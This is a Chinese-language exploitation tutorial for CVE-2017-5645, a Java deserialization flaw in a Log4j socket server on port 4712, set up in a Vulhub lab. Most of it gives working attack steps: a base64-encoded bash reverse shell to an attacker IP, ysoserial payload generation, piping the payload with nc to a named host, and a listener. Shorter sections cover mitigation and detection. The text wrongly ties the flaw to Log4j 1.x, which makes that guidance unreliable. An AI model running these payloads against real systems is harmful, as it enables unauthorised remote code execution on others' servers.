Apache Log4j反序列化漏洞(CVE-2017-5645)深入分析与利用教程<\/h1>

1. 漏洞概述<\/h2>

1.1 漏洞基本信息<\/h3>

漏洞编号<\/strong>: CVE-2017-5645<\/li>
影响组件<\/strong>: Apache Log4j 1.x版本<\/li>
漏洞类型<\/strong>: 反序列化远程代码执行<\/li>
CVSS评分<\/strong>: 9.8 (Critical)<\/li>

默认利用端口<\/strong>: 4712 (SocketServer默认端口)<\/li> <\/ul>
1.2 漏洞影响范围<\/h3>

所有使用Apache Log4j 1.x版本且启用了SocketServer功能的Java应用程序<\/li>
特别影响将Log4j配置为通过网络接收日志数据的系统<\/li> <\/ul>
2. 漏洞技术分析<\/h2>
2.1 漏洞成因<\/h3>

根本原因<\/strong>: Log4j 1.x的SocketServer类在接收网络日志数据时，直接使用ObjectInputStream<\/code>反序列化对象，没有进行任何安全检查<\/li>
危险操作<\/strong>: ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>socket.<\/span>getInputStream<\/span>());<\/span> <\/span><\/span>LoggingEvent event =<\/span> (<\/span>LoggingEvent)<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> 利用条件<\/strong>: 攻击者能够向目标系统的4712端口发送恶意构造的序列化数据<\/li> <\/ul> 2.2 漏洞利用链<\/h3> 攻击者构造恶意序列化对象<\/li> 通过Socket协议将对象发送到目标IP的4712端口<\/li> 目标服务器反序列化恶意对象<\/li> 触发远程代码执行<\/li> <\/ol> 3. 漏洞复现环境搭建<\/h2> 3.1 使用Vulhub快速搭建<\/h3> # 下载Vulhub<\/span> <\/span><\/span>git clone https:\/\/github.com\/vulhub\/vulhub.git <\/span><\/span>cd vulhub\/log4j\/CVE-2017-5645 <\/span><\/span> <\/span><\/span># 启动漏洞环境<\/span> <\/span><\/span>docker-compose up -d <\/span><\/span><\/code><\/pre>3.2 环境验证<\/h3> 检查容器是否正常运行: docker ps <\/span><\/span><\/code><\/pre><\/li> 确认4712端口已开放: netstat -tulnp | grep 4712<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. 漏洞利用详细步骤<\/h2> 4.1 准备利用工具<\/h3> ysoserial<\/strong>: Java反序列化利用工具 wget https:\/\/jitpack.io\/com\/github\/frohoff\/ysoserial\/master-SNAPSHOT\/ysoserial-master-SNAPSHOT.jar <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.2 构造反弹Shell命令<\/h3> 准备Base64编码的反弹Shell命令:<\/p> echo "bash -i >& \/dev\/tcp\/攻击者IP\/端口 0>&1"<\/span> | base64 <\/span><\/span><\/code><\/pre>示例输出: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzgwODAgMD4mMQ==<\/code><\/p> <\/li> 构造最终命令格式:<\/p> bash -c {<\/span>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzgwODAgMD4mMQ==}<\/span>|{<\/span>base64,-d}<\/span>|{<\/span>bash,-i}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 生成Payload<\/h3> 使用ysoserial生成恶意序列化对象:<\/p> java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span> > payload.bin <\/span><\/span><\/code><\/pre>4.4 发送Payload<\/h3> 方法一: 分步执行<\/p> nc <目标IP> 4712<\/span> < payload.bin <\/span><\/span><\/code><\/pre><\/li> 方法二: 直接管道执行<\/p> java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span> | nc vulhub.yster.live 4712<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.5 接收反弹Shell<\/h3> 在攻击机监听指定端口:<\/p> nc -lvnp 8080<\/span> <\/span><\/span><\/code><\/pre>5. 漏洞利用注意事项<\/h2> 命令验证问题<\/strong>:<\/p> 目标环境可能缺少某些基础命令(如ping)<\/li> 建议先使用id<\/code>或whoami<\/code>等基本命令验证执行是否成功<\/li> <\/ul> <\/li> 协议限制<\/strong>:<\/p> 仅支持Socket协议发送<\/li> 实测POST请求无法成功利用<\/li> <\/ul> <\/li> 利用链选择<\/strong>:<\/p> CommonsCollections5是较稳定的利用链<\/li> 根据目标环境可能需要尝试其他利用链(如CommonsCollections1-7)<\/li> <\/ul> <\/li> <\/ol> 6. 漏洞防御措施<\/h2> 6.1 临时缓解方案<\/h3> 禁用Log4j的SocketServer功能<\/li> 在网络边界限制对4712端口的访问<\/li> <\/ul> 6.2 长期修复方案<\/h3> 升级到Log4j 2.x版本 <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.logging.log4j<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>log4j-core<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.17.1<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre><\/li> 使用安全配置禁用不必要功能<\/li> <\/ul> 6.3 防御性编程<\/h3> 使用白名单机制验证反序列化对象<\/li> 实现自定义的ObjectInputStream并重写resolveClass方法<\/li> <\/ul> 7. 漏洞分析总结<\/h2> 技术要点<\/strong>:<\/p> 不安全的反序列化操作是根本原因<\/li> 利用Java反序列化漏洞执行任意命令<\/li> 依赖Commons Collections等库的利用链<\/li> <\/ul> <\/li> 利用特点<\/strong>:<\/p> 无需认证，直接发送恶意数据即可利用<\/li> 影响默认配置下的Log4j 1.x版本<\/li> <\/ul> <\/li> 防护关键<\/strong>:<\/p> 及时升级到安全版本<\/li> 最小化网络暴露面<\/li> 实施输入验证和过滤<\/li> <\/ul> <\/li> <\/ol> 附录：常用命令参考<\/h2> 检查系统是否受影响:<\/p> find \/ -name "log4j-*.jar"<\/span> -exec sh -c 'unzip -p {} META-INF\/MANIFEST.MF | grep "Implementation-Version"'<\/span> \;<\/span> <\/span><\/span><\/code><\/pre><\/li> 快速检测脚本:<\/p> echo "检测Log4j版本..."<\/span> <\/span><\/span>find \/ -name "log4j-*.jar"<\/span> 2>\/dev\/null | while<\/span> read file; do<\/span> <\/span><\/span> version=<\/span>$(<\/span>unzip -p "<\/span>$file"<\/span> META-INF\/MANIFEST.MF 2>\/dev\/null | grep "Implementation-Version"<\/span> | cut -d':'<\/span> -f2 | tr -d '[:space:]'<\/span>)<\/span> <\/span><\/span> echo "<\/span>$file: <\/span>$version"<\/span> <\/span><\/span>done<\/span> <\/span><\/span><\/code><\/pre><\/li> 应急处理命令:<\/p> # 临时禁用SocketServer<\/span> <\/span><\/span>kill $(<\/span>lsof -t -i:4712)<\/span> <\/span><\/span>iptables -A INPUT -p tcp --dport 4712<\/span> -j DROP <\/span><\/span><\/code><\/pre><\/li> <\/ol>